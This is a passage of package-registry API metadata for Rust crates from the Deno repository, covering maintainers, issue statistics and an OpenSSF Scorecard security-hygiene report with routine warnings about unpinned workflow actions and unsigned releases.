16.95609541526534,"stargazers_count":0.04215426628666734,"forks_count":0.10080368025072624,"average":14.787533333944264},"purl":"pkg:cargo/deno_cli_snapshots","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cli_snapshots","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cli_snapshots","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cli_snapshots/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_snapshots/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:22.100Z","updated_at":"2022-11-07T18:29:22.100Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:22.129Z","updated_at":"2022-11-07T18:29:22.129Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11268548,"name":"deno_process","ecosystem":"cargo","description":"Subprocess APIs for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":73,"first_release_published_at":"2025-01-15T11:23:39.535Z","latest_release_published_at":"2026-08-27T15:21:09.002Z","latest_release_number":"0.73.0","last_synced_at":"2026-09-07T22:54:36.847Z","created_at":"2025-01-15T11:32:30.986Z","updated_at":"2026-09-08T15:20:51.790Z","registry_url":"https://crates.io/crates/deno_process/","install_command":"cargo install deno_process","documentation_url":"https://docs.rs/deno_process/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed 